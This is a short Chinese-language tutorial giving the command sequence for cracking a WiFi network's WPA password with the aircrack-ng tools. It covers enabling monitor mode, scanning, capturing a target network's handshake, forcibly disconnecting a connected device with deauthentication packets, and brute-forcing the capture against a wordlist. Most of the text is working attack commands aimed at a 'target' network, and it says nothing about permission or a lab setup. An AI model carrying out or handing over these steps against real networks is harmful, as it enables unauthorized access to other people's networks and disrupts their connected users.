需要一个支持监听模式的网卡
先查看一下usb网卡是否连接到虚拟机
airmon-ng 查看网卡是否在监听模式
显示wlan0说明不在监听模式
airmon-ng start wlan0 开启监听模式
ifconfig 显示wlan0mon表示以在监听模式
airodump-ng wlan0mon 搜索附近WiFi
搜索到目标WiFi CTRL+C暂停扫描
抓取握手包
airodump-ng -w 握手包文件名 -c 信道 --bssid 目标bssid地址 wlan0mon
BSSID WiFi设备的MAC地址
PWR 信号水平
Beacons 数据的速率
Date 捕获的数据分组数量
/S 十秒内的捕获数据分组量
CH 信道号
MB 数据传输速率
ENC 加密类型
CIPHER 加密算法
AUTH 认证协议
ESSID WIFI名称
新建终端窗口
aireplay-ng -0 反认证包个数(随意) -a (路由器mac地址(bssid)) -c 连接设备 mac wlan0mon
抓到握手包后抓取的设备后会显示WiFi名字
抓取到后握手包会储存到主目录
对握手包进行暴力破解
aircrack-ng -w /usr/share/sqlmap/txt/wordlist.txt 握手包文件名.cap
这种方法依靠字典的和计算机的运行速度,假如目标WIFI设备的密码复杂性强,或者跑了几G的字典,而该字典并没有该密码,这将是很浪费时间的事情。 关于字典,字典也并不是越大越好,大家可以利用工具生成或从网络上下载一份字典。或者根据自己收集的材料和推断自己做字典。
